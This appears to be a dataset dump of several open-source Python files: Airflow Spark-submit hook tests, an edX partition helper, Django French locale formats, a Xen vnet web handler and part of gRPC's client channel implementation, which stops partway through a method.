hook = SparkSubmitHook(conn_id='spark_home_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": "/opt/myspark",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/opt/myspark/bin/spark-submit'
def test_resolve_connection_spark_home_not_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_home_not_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'spark-submit'
def test_resolve_connection_spark_binary_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'custom-spark-submit'
def test_resolve_connection_spark_binary_default_value_override(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_set', spark_binary='another-custom-spark-submit')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "another-custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'another-custom-spark-submit'
def test_resolve_connection_spark_binary_default_value(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": 'root.default',
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'spark-submit'
def test_resolve_connection_spark_binary_and_home_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_and_home_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": "/path/to/spark_home",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/path/to/spark_home/bin/custom-spark-submit'
def test_resolve_connection_spark_standalone_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "spark://spark-standalone-master:6066",
"spark_binary": "spark-submit",
"deploy_mode": "cluster",
"queue": None,
"spark_home": "/path/to/spark_home",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/path/to/spark_home/bin/spark-submit'
def test_resolve_spark_submit_env_vars_standalone_client_mode(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster_client_mode', env_vars={"bar": "foo"})
# When
hook._build_spark_submit_command(self._spark_job_file)
# Then
assert hook._env == {"bar": "foo"}
def test_resolve_spark_submit_env_vars_standalone_cluster_mode(self):
def env_vars_exception_in_standalone_cluster_mode():
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster', env_vars={"bar": "foo"})
# When
hook._build_spark_submit_command(self._spark_job_file)
# Then
with pytest.raises(AirflowException):
env_vars_exception_in_standalone_cluster_mode()
def test_resolve_spark_submit_env_vars_yarn(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars={"bar": "foo"})
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
assert cmd[4] == "spark.yarn.appMasterEnv.bar=foo"
assert hook._env == {"bar": "foo"}
def test_resolve_spark_submit_env_vars_k8s(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster', env_vars={"bar": "foo"})
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
assert cmd[4] == "spark.kubernetes.driverEnv.bar=foo"
def test_process_spark_submit_log_yarn(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster')
log_lines = [
'SPARK_MAJOR_VERSION is set to 2, using Spark2',
'WARN NativeCodeLoader: Unable to load native-hadoop library for your '
+ 'platform... using builtin-java classes where applicable',
'WARN DomainSocketFactory: The short-circuit local reads feature cannot '
'be used because libhadoop cannot be loaded.',
'INFO Client: Requesting a new application from cluster with 10 NodeManagers',
'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager',
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._yarn_application_id == 'application_1486558679801_1820'
def test_process_spark_submit_log_k8s(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = [
'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,'
+ 'spark-role -> driver'
+ 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42'
+ 'creation time: 2018-03-05T10:26:55Z'
+ 'service account name: spark'
+ 'volumes: spark-init-properties, download-jars-volume,'
+ 'download-files-volume, spark-token-2vmlm'
+ 'node name: N/A'
+ 'start time: N/A'
+ 'container images: N/A'
+ 'phase: Pending'
+ 'status: []'
+ '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,'
+ ' new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'Exit code: 999'
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._kubernetes_driver_pod == 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
assert hook._spark_exit_code == 999
def test_process_spark_submit_log_k8s_spark_3(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = ['exit code: 999']
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._spark_exit_code == 999
def test_process_spark_submit_log_standalone_cluster(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
log_lines = [
'Running Spark using the REST application submission protocol.',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request '
'to launch an application in spark://spark-standalone-master:6066',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully '
+ 'created as driver-20171128111415-0001. Polling submission state...',
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._driver_id == 'driver-20171128111415-0001'
def test_process_spark_driver_status_log(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
log_lines = [
'Submitting a request for the status of submission '
+ 'driver-20171128111415-0001 in spark://spark-standalone-master:6066',
'17/11/28 11:15:37 INFO RestSubmissionClient: Server responded with '
+ 'SubmissionStatusResponse:',
'{',
'"action" : "SubmissionStatusResponse",',
'"driverState" : "RUNNING",',
'"serverSparkVersion" : "1.6.0",',
'"submissionId" : "driver-20171128111415-0001",',
'"success" : true,',
'"workerHostPort" : "172.18.0.7:38561",',
'"workerId" : "worker-20171128110741-172.18.0.7-38561"',
'}',
]
# When
hook._process_spark_status_log(log_lines)
# Then
assert hook._driver_status == 'RUNNING'
@patch('airflow.providers.apache.spark.hooks.spark_submit.renew_from_kt')
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_yarn_process_on_kill(self, mock_popen, mock_renew_from_kt):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.poll.return_value = None
mock_popen.return_value.wait.return_value = 0
log_lines = [
'SPARK_MAJOR_VERSION is set to 2, using Spark2',
'WARN NativeCodeLoader: Unable to load native-hadoop library for your '
+ 'platform... using builtin-java classes where applicable',
'WARN DomainSocketFactory: The short-circuit local reads feature cannot '
+ 'be used because libhadoop cannot be loaded.',
'INFO Client: Requesting a new application from cluster with 10 '
+ 'NodeManagerapplication_1486558679801_1820s',
'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager',
]
env = {"PATH": "hadoop/bin"}
hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars=env)
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
assert (
call(
['yarn', 'application', '-kill', 'application_1486558679801_1820'],
env={**os.environ, **env},
stderr=-1,
stdout=-1,
)
in mock_popen.mock_calls
)
# resetting the mock to test kill with keytab & principal
mock_popen.reset_mock()
# Given
hook = SparkSubmitHook(
conn_id='spark_yarn_cluster', keytab='privileged_user.keytab', principal='user/spark@airflow.org'
)
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
expected_env = os.environ.copy()
expected_env["KRB5CCNAME"] = '/tmp/airflow_krb5_ccache'
assert (
call(
['yarn', 'application', '-kill', 'application_1486558679801_1820'],
env=expected_env,
stderr=-1,
stdout=-1,
)
in mock_popen.mock_calls
)
def test_standalone_cluster_process_on_kill(self):
# Given
log_lines = [
'Running Spark using the REST application submission protocol.',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request '
+ 'to launch an application in spark://spark-standalone-master:6066',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully '
+ 'created as driver-20171128111415-0001. Polling submission state...',
]
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
hook._process_spark_submit_log(log_lines)
# When
kill_cmd = hook._build_spark_driver_kill_command()
# Then
assert kill_cmd[0] == '/path/to/spark_home/bin/spark-submit'
assert kill_cmd[1] == '--master'
assert kill_cmd[2] == 'spark://spark-standalone-master:6066'
assert kill_cmd[3] == '--kill'
assert kill_cmd[4] == 'driver-20171128111415-0001'
@patch('airflow.kubernetes.kube_client.get_kube_client')
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_k8s_process_on_kill(self, mock_popen, mock_client_method):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.poll.return_value = None
mock_popen.return_value.wait.return_value = 0
client = mock_client_method.return_value
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = [
'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,'
+ 'spark-role -> driver'
+ 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42'
+ 'creation time: 2018-03-05T10:26:55Z'
+ 'service account name: spark'
+ 'volumes: spark-init-properties, download-jars-volume,'
+ 'download-files-volume, spark-token-2vmlm'
+ 'node name: N/A'
+ 'start time: N/A'
+ 'container images: N/A'
+ 'phase: Pending'
+ 'status: []'
+ '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,'
+ ' new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'Exit code: 0'
]
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
import kubernetes
kwargs = {'pretty': True, 'body': kubernetes.client.V1DeleteOptions()}
client.delete_namespaced_pod.assert_called_once_with(
'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver', 'mynamespace', **kwargs
)
@parameterized.expand(
(
(
("spark-submit", "foo", "--bar", "baz", "--password='secret'", "--foo", "bar"),
"spark-submit foo --bar baz --password='******' --foo bar",
),
(
("spark-submit", "foo", "--bar", "baz", "--password='secret'"),
"spark-submit foo --bar baz --password='******'",
),
(
("spark-submit", "foo", "--bar", "baz", '--password="secret"'),
'spark-submit foo --bar baz --password="******"',
),
(
("spark-submit", "foo", "--bar", "baz", '--password=secret'),
'spark-submit foo --bar baz --password=******',
),
(
("spark-submit", "foo", "--bar", "baz", "--password 'secret'"),
"spark-submit foo --bar baz --password '******'",
),
(
("spark-submit", "foo", "--bar", "baz", "--password='sec\"ret'"),
"spark-submit foo --bar baz --password='******'",
),
(
("spark-submit", "foo", "--bar", "baz", '--password="sec\'ret"'),
'spark-submit foo --bar baz --password="******"',
),
(
("spark-submit",),
"spark-submit",
),
)
)
    def test_masks_passwords(self, command: tuple, expected: str) -> None:
# Given
hook = SparkSubmitHook()
# When
command_masked = hook._mask_cmd(command)
# Then
assert command_masked == expected
| apache-2.0 |
mitocw/edx-platform | common/lib/xmodule/xmodule/partitions/enrollment_track_partition_generator.py | 4 | 1792 | """
The enrollment_track dynamic partition generation to be part of the
openedx.dynamic_partition plugin.
"""
import logging
import six
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from xmodule.partitions.partitions import (
get_partition_from_id,
ENROLLMENT_TRACK_PARTITION_ID,
UserPartition,
UserPartitionError
)
log = logging.getLogger(__name__)
FEATURES = getattr(settings, 'FEATURES', {})
def create_enrollment_track_partition(course):
"""
Create and return the dynamic enrollment track user partition.
If it cannot be created, None is returned.
"""
if not FEATURES.get('ENABLE_ENROLLMENT_TRACK_USER_PARTITION'):
return None
try:
enrollment_track_scheme = UserPartition.get_scheme("enrollment_track")
except UserPartitionError:
log.warning("No 'enrollment_track' scheme registered, EnrollmentTrackUserPartition will not be created.")
return None
used_ids = set(p.id for p in course.user_partitions)
if ENROLLMENT_TRACK_PARTITION_ID in used_ids:
log.warning(
"Can't add 'enrollment_track' partition, as ID {id} is assigned to {partition} in course {course}.".format(
id=ENROLLMENT_TRACK_PARTITION_ID,
partition=get_partition_from_id(course.user_partitions, ENROLLMENT_TRACK_PARTITION_ID).name,
course=six.text_type(course.id)
)
)
return None
partition = enrollment_track_scheme.create_user_partition(
id=ENROLLMENT_TRACK_PARTITION_ID,
name=_(u"Enrollment Track Groups"),
description=_(u"Partition for segmenting users by enrollment track"),
parameters={"course_id": six.text_type(course.id)}
)
return partition
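# Illustrative call site (sketch; `course` here is any object exposing
# `user_partitions` and `id`, as assumed by the function above):
#
#     partition = create_enrollment_track_partition(course)
#     if partition is not None:
#         course.user_partitions.append(partition)
#
# The None check matters because the function returns None both when the
# feature flag is disabled and when the partition ID is already taken.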
| agpl-3.0 |
ubgarbage/gae-blog | django/conf/locale/fr/formats.py | 232 | 1530 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'H:i:s'
DATETIME_FORMAT = 'j F Y H:i:s'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j N Y'
SHORT_DATETIME_FORMAT = 'j N Y H:i:s'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
'%d.%m.%Y', '%d.%m.%y', # Swiss (fr_CH), '25.10.2006', '25.10.06'
'%Y-%m-%d', '%y-%m-%d', # '2006-10-25', '06-10-25'
# '%d %B %Y', '%d %b %Y', # '25 octobre 2006', '25 oct. 2006'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '14:30:59'
'%H:%M', # '14:30'
)
DATETIME_INPUT_FORMATS = (
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d.%m.%Y %H:%M:%S', # Swiss (fr_CH), '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # Swiss (fr_CH), '25.10.2006 14:30'
'%d.%m.%Y', # Swiss (fr_CH), '25.10.2006'
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' '
NUMBER_GROUPING = 3
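# Quick sanity check of the input formats above (illustrative, using the
# standard library directly rather than Django's form machinery):
#
#     import datetime
#     datetime.datetime.strptime('25/10/2006 14:30', '%d/%m/%Y %H:%M')
#     # -> datetime.datetime(2006, 10, 25, 14, 30)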
| bsd-3-clause |
sunny-wyb/xen-4.1.2 | dist/install/usr/lib/python2.7/site-packages/xen/xend/server/SrvVnetDir.py | 52 | 4339 | #============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2004, 2005 Mike Wray <mike.wray@hp.com>
#============================================================================
from xen.xend import sxp
from xen.xend.Args import FormFn
from xen.xend import PrettyPrint
from xen.xend import XendVnet
from xen.xend.XendError import XendError
from xen.web.SrvDir import SrvDir
class SrvVnet(SrvDir):
def __init__(self, vnetinfo):
SrvDir.__init__(self)
self.vnetinfo = vnetinfo
self.xvnet = XendVnet.instance()
def op_delete(self, op, req):
val = self.xvnet.vnet_delete(self.vnetinfo.id)
return val
def render_POST(self, req):
return self.perform(req)
def render_GET(self, req):
if self.use_sxp(req):
req.setHeader("Content-Type", sxp.mime_type)
sxp.show(self.vnetinfo.sxpr(), out=req)
else:
req.write('<html><head></head><body>')
self.print_path(req)
req.write('<p>Vnet %s</p>' % self.vnetinfo.id)
req.write("<code><pre>")
PrettyPrint.prettyprint(self.vnetinfo.sxpr(), out=req)
req.write("</pre></code>")
self.form(req)
req.write('</body></html>')
return ''
def form(self, req):
url = req.prePathURL()
req.write('<form method="post" action="%s">' % url)
req.write('<input type="submit" name="op" value="delete">')
req.write('</form>')
class SrvVnetDir(SrvDir):
"""Vnet directory.
"""
def __init__(self):
SrvDir.__init__(self)
self.xvnet = XendVnet.instance()
def vnet(self, x):
val = None
vnetinfo = self.xvnet.vnet_get(x)
if not vnetinfo:
raise XendError('No such vnet ' + str(x))
val = SrvVnet(vnetinfo)
return val
def get(self, x):
v = SrvDir.get(self, x)
if v is not None:
return v
v = self.vnet(x)
return v
def op_create(self, op, req):
fn = FormFn(self.xvnet.vnet_create,
[['config', 'sxpr']])
val = fn(req.args, {})
return val
def render_POST(self, req):
return self.perform(req)
def render_GET(self, req):
if self.use_sxp(req):
req.setHeader("Content-Type", sxp.mime_type)
self.ls_vnet(req, 1)
else:
req.write("<html><head></head><body>")
self.print_path(req)
self.ls(req)
self.ls_vnet(req)
self.form(req)
req.write("</body></html>")
def ls_vnet(self, req, use_sxp=0):
url = req.prePathURL()
if not url.endswith('/'):
url += '/'
if use_sxp:
vnets = self.xvnet.vnet_ls()
sxp.show(vnets, out=req)
else:
vnets = self.xvnet.vnets()
vnets.sort(lambda x, y: cmp(x.id, y.id))
req.write('<ul>')
for v in vnets:
req.write('<li><a href="%s%s"> Vnet %s</a>' % (url, v.id, v.id))
req.write('</li>')
req.write('</ul>')
def form(self, req):
"""Generate the form(s) for vnet dir operations.
"""
req.write('<form method="post" action="%s" enctype="multipart/form-data">'
% req.prePathURL())
req.write('<button type="submit" name="op" value="create">Create Vnet</button>')
req.write('Config <input type="file" name="config"><br>')
req.write('</form>')
| gpl-2.0 |
thinkerou/grpc | src/python/grpcio/grpc/_channel.py | 1 | 38484 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call):
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
